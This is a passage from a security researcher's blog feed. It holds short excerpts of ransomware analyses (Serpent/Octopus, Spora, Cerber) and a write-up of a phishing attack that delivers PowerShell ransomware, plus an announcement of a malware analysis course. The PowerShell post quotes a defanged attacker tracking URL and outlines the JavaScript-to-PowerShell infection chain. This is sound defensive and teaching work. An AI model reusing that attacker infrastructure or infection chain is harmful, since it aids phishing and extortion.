<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">First, why Facebook and Google security teams haven’t yet stopped the scams of such kind. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Second, how aggressively an advertising company can attack the target audience. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Yara rule</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><a href="https://github.com/AlexanderAda/NioGuardSecurityLab/blob/master/rulesets/Yara/facebook_scam.yara" style="text-decoration: none;">https://github.com/AlexanderAda/NioGuardSecurityLab/blob/master/rulesets/Yara/facebook_scam.yara</a></span></div>
<div>
<br /></div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-20421005312350270612017-08-10T00:26:00.000-07:002017-10-18T06:15:58.294-07:00Serpent Ransomware Analysis<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSbVL3ZXtQ8gL2MAwfu_nGtMbQ1RBcRkca07BP3YA9nyc8r7t0dqzpAkRXynEtlqxNat0C7EGFG0xCeutQ_yUrtSjvD5TGb5U1V-dbYgMiUrPHpkpPLyD6m3CIqgGZNNYwrSFwZ0Sz2jqR/s1600/serpent-ui.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="725" data-original-width="926" height="500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSbVL3ZXtQ8gL2MAwfu_nGtMbQ1RBcRkca07BP3YA9nyc8r7t0dqzpAkRXynEtlqxNat0C7EGFG0xCeutQ_yUrtSjvD5TGb5U1V-dbYgMiUrPHpkpPLyD6m3CIqgGZNNYwrSFwZ0Sz2jqR/s640/serpent-ui.png" width="640" /></a></div>
<div>
The new Octopus cryptolocker being an offspring of the Serpent/Zyklon/WildFire/HadesLocker families shows that .NET ransomware can be not an easy meat for a reverse engineer. It leverages several types of obfuscation, code encryption, and anti-debugging to protect its C# code from decompilation and analysis.</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-59219808311925851512017-08-07T01:13:00.001-07:002017-10-18T06:16:13.372-07:00Spora Ransomware Analysis<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuYcyNI75FyACnKrGPtIe_50UuzeW2xtVNxElpa_ih8m8BVAjMsWZuD9rRz_vAOyMDNjS3PiRRYVCucAcSpgKGO3HOsSF5f5FjlVH3GWWUfKti6Rn8XyoDscaKetmMHnNUyVA1peqpttbf/s1600/Spora_webUI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="698" data-original-width="1123" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuYcyNI75FyACnKrGPtIe_50UuzeW2xtVNxElpa_ih8m8BVAjMsWZuD9rRz_vAOyMDNjS3PiRRYVCucAcSpgKGO3HOsSF5f5FjlVH3GWWUfKti6Rn8XyoDscaKetmMHnNUyVA1peqpttbf/s640/Spora_webUI.png" width="640" /></a></div>
<br />
<br />
Similar to <a href="https://nioguard.blogspot.com/2017/07/new-variant-of-cerber-ransomware-ferber.html">Cerber (Ferber) ransomware</a>, Spora has its own intricate encryption file format and does not encrypt the whole file. The encryption block size varies depending on a file size.Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-5615954917432015902017-07-28T12:27:00.002-07:002017-10-18T06:16:26.501-07:00New variant of Cerber ransomware (Ferber) analyzed<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPUfJvrEFkMygcWAg45bmc_Z37np4pxoPaQtF4I4EliHFMw2UU9oQ0utr1syL5UWUNTW43l-pOWe655y-MKAqcOs_WQxnmCR4KezsIs_r0hewr6G3tCZOirMQGnSXtTwsIfYcworVXzy15/s1600/wallpaper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="528" data-original-width="796" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPUfJvrEFkMygcWAg45bmc_Z37np4pxoPaQtF4I4EliHFMw2UU9oQ0utr1syL5UWUNTW43l-pOWe655y-MKAqcOs_WQxnmCR4KezsIs_r0hewr6G3tCZOirMQGnSXtTwsIfYcworVXzy15/s640/wallpaper.png" width="640" /></a></div>
<br />
This summer Cerber is on duty. It comes via spear-phishing emails, bypasses antiviruses leveraging <span style="background-color: white; color: #333333; font-family: "open sans"; font-size: 16px;">polymorphic encryption and API calls obfuscation. The cryptolocker can be easily customized for every target by embedding the </span><span style="background-color: white; color: #333333; font-family: "open sans"; font-size: 16px;">JSON-formatted </span><span style="background-color: white; color: #333333; font-family: "open sans"; font-size: 16px;">configuration data encrypted with RC4-128 (the decrypted config is on <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/blob/master/RansomwareAnalysis/Cerber/cerber_config_cfd2d6f189b04d42618007fc9c540352.json">Github</a> for </span><a href="https://www.virustotal.com/en/file/408fd7edadfbdaab161e04afcfc115c464916e99aaba8b036f52c57c3ade49c5/analysis/" style="font-family: "Open Sans"; font-size: 16px;">cfd2d6f189b04d42618007fc9c540352</a>)<span style="background-color: white; color: #333333; font-family: "open sans"; font-size: 16px;">. The file encryption scheme '</span><span style="background-color: white; color: #333333; font-family: "open sans"; font-size: 16px;">master RSA-2048 key'-> 'session RSA-880' -> 'file's RC4-128'</span> used by Cerber is<span style="background-color: white; color: #333333; font-family: "open sans"; font-size: 16px;"> not breakable. Cerber scans the IP ranges </span><span style="background-color: white; color: #333333; font-family: "open sans"; font-size: 16px;">specified by CIDRs in the config </span><span style="background-color: white; color: #333333; font-family: "open sans"; font-size: 16px;">for the C&C server. </span><br />
<span id="goog_13839579"></span>Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-29288398314363863352017-07-12T00:21:00.000-07:002017-10-18T06:17:46.705-07:00Targeted attack with PowerShell ransomware comes undetected<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSVDwZ9j_YU3qNEmN9aZie5p6PqbZyjQGFkVR6LoKO2L8L8IlcesRvnDr4lGV8J4xoMh_EmktHoj85v_AHHitYnlQHkTv-j_f_rm0v62Kk2OcNKXWyRmnQrzMNYRuw_dfUqlGp-Do2OsKp/s1600/email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="1062" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSVDwZ9j_YU3qNEmN9aZie5p6PqbZyjQGFkVR6LoKO2L8L8IlcesRvnDr4lGV8J4xoMh_EmktHoj85v_AHHitYnlQHkTv-j_f_rm0v62Kk2OcNKXWyRmnQrzMNYRuw_dfUqlGp-Do2OsKp/s640/email.png" width="640" /></a></div>
<span id="goog_173180143"></span><span id="goog_173180144"></span><br />
The undetected PowerShell ransomware was used to attack the popular German car dealer. The attack launched through the spear phishing email looked like a mail delivery notification.<br />
<br />
<a name='more'></a><br />
The HTML message contains the image tag with the link used to notify the attacker about opening the email:<br />
<br />
<img src="hxxp://joelosteel.gdn/wp-admin/open.php?M=824054&N=11&L=8"><br />
<br />
The zip attachment contains JavaScript that starts PowerShell and executes the ransomware script.<br />
The JS was not detected by any of the antiviruses when first uploaded.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjqMxszRufjC9bQXjIBNsB6S3z4WkCA7-WMm3WdhE1UMBaqoI2vDVmd0DnIdNEbxQdDTjA0exc3Rk5kJliEfHqCQi3tsB4ulUwkYi2mLC38SU3iQeShpT8gdxd3VqcWyhQWKYrj0mHdkB3/s1600/vt0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="341" data-original-width="1213" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjqMxszRufjC9bQXjIBNsB6S3z4WkCA7-WMm3WdhE1UMBaqoI2vDVmd0DnIdNEbxQdDTjA0exc3Rk5kJliEfHqCQi3tsB4ulUwkYi2mLC38SU3iQeShpT8gdxd3VqcWyhQWKYrj0mHdkB3/s640/vt0.png" width="640" /></a></div>
<br />
<br />Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-30555395327441514402017-07-08T14:56:00.000-07:002017-11-21T02:57:18.601-08:00New Cyber Security Course for Master Students<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifVp7ZKAC2SMGBp91zjh6Ns1Twa0tTom6KtDoeRKGHK7m8iehLZR_md8gcZFqHBBmq6l3HHwkNnAHRr-IYPATKMDPgt7jym4rpezVAruv23UeT-G4Yzihdlv8i2xzZ7zGl0w7raHi28ou5/s1600/engensec6.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifVp7ZKAC2SMGBp91zjh6Ns1Twa0tTom6KtDoeRKGHK7m8iehLZR_md8gcZFqHBBmq6l3HHwkNnAHRr-IYPATKMDPgt7jym4rpezVAruv23UeT-G4Yzihdlv8i2xzZ7zGl0w7raHi28ou5/s1600/engensec6.png" /></a><br />
<br />
I'm happy to announce the new <b>Advanced Malware Analysis </b>course I've been working for eight years is coming out soon as a part of the EU academic project <a href="http://engensec.eu/about-the-project/">ENGENSEC</a> financed by the European Commission. In light of the recent nation-state cyber attacks, I'm glad for being related to educating the next generation of cybersecurity experts being able to counteract cyber attacks at any level.<br />
<a name='more'></a><br />
The course will be adopted by universities in Ukraine, Sweden, Poland, and other partners. It will include theoretical and practical classes on the latest types of cyber attacks, analysis, detection, and prevention technologies totaling 270 hours (7.5 ECTS). You can find the course content below.<br />
<br />
The course will be presented during the <a href="http://engensec.eu/it-summer/">Summer School</a> for students and Train the Trainer workshop for teachers this summer in <a href="http://www.lp.edu.ua/en">Lviv Polytechnic National University</a>.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio_U9o_r6HVyeCANEq303r9qDT6kojBEjZyG6W_I_ou6s5dMALBypi_UnzNg-o-z-Lo95DD7kdx5UXBE0mC3mejysMpK2GXXW9b9mKyo0gG1BOU-7DBTCgC0R5LYKxU_Bbgo7XPXkNBJGu/s1600/Engensec_Malware_Dev.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio_U9o_r6HVyeCANEq303r9qDT6kojBEjZyG6W_I_ou6s5dMALBypi_UnzNg-o-z-Lo95DD7kdx5UXBE0mC3mejysMpK2GXXW9b9mKyo0gG1BOU-7DBTCgC0R5LYKxU_Bbgo7XPXkNBJGu/s200/Engensec_Malware_Dev.jpg" width="200" /></a><br />
Finally, I'd like to thank everyone who has contributed to this course, namely:<br />
<div>
<ul>
<li>Anders Carlsson, BTH</li>
<li>Dragos Ilie, BTH</li>
<li>Dmitriy Komashinskiy, F-Secure</li>
<li>Vladimir Obrizan, <a href="http://dnt-lab.com/">Design and Test Lab</a></li>
</ul>
<br />
We welcome security and academic organizations to join the reviewing process.<br />
<div>
Our contacts:</div>
</div>
<ul>
<li>anders.carlsson (at) bth.se - the general manager of the ENGENSEC project</li>
<li>oleksandr.adamov (at) nure.ua - the Malware Analysis course manager of the ENGENSEC project</li>
</ul>
<div>
<b>Malware Analysis course content</b></div>
<div>
<b><br /></b></div>
<div>
<div>
Lectures:</div>
<div>
<ol>
<li>History of computer threats</li>
<li>Classification of computer threats</li>
<li>Attack techniques and infection vectors</li>
<li>Disassembly</li>
<li>Phishing</li>
<li>Online banking threats</li>
<li>Ransomware: cryptolockers</li>
<li>Botnets</li>
<li>Mobile threats in iOS</li>
<li>Mobile threats in Android</li>
<li>Social networking threats</li>
<li>Vulnerabilities and exploits</li>
<li>Drive-by attacks</li>
<li>Rootkits/bootkits</li>
<li>Targeted attacks and industrial malware</li>
<li>Incident response</li>
</ol>
</div>
<div>
Labs:</div>
</div>
<div>
<div>
<ol>
<li>Malware Detection and Removal</li>
<li>Malware Static Analysis</li>
<li>Malware Dynamic Analysis</li>
<li>Analysis of Exploits</li>
<li>Reverse Engineering x86/ARM</li>
<li>Advanced Unpacking</li>
<li>Rootkits</li>
<li>Android Malware Analysis</li>
<li>Data Mining with RapidMiner</li>
<li>Data Mining with Maltego</li>
</ol>
</div>
</div>
<div>
Practice:</div>
<div>
<div>
<ol>
<li>Analysis of host-based attributes for phishing URLs</li>
<li>x86 Disassembly: Typical C Constructs</li>
<li>x86 Disassembly: Analysis of decryption (deobfuscation) routine used by malware</li>
</ol>
</div>
</div>
<div>
Demos:</div>
<div>
<ol>
<li>Analysis of CozyDuke APT</li>
<li>Static Analysis PE</li>
<li>x86 ASM and Debugging</li>
<li>Exploits: Stack Overrun</li>
<li>Debugging Android CrackMe</li>
<li>Analysis of spear phishing attacks</li>
<li>Analysis of TeslaCrypt ransomware</li>
<li>Analysis of XData ransomware</li>
<li>Analysis of NotPetya cyber attack</li>
</ol>
<div>
Other <a href="http://engensec.eu/course-modules/">ENGENSEC courses</a>:</div>
</div>
<div>
<div>
<ul>
<li>Advanced Network and Cloud Security</li>
<li>Wireless and Mobile Security</li>
<li>Secure Software Development</li>
<li>Web Security</li>
<li>Pentest and Ethical Hacking</li>
<li>Digital Forensics</li>
</ul>
</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0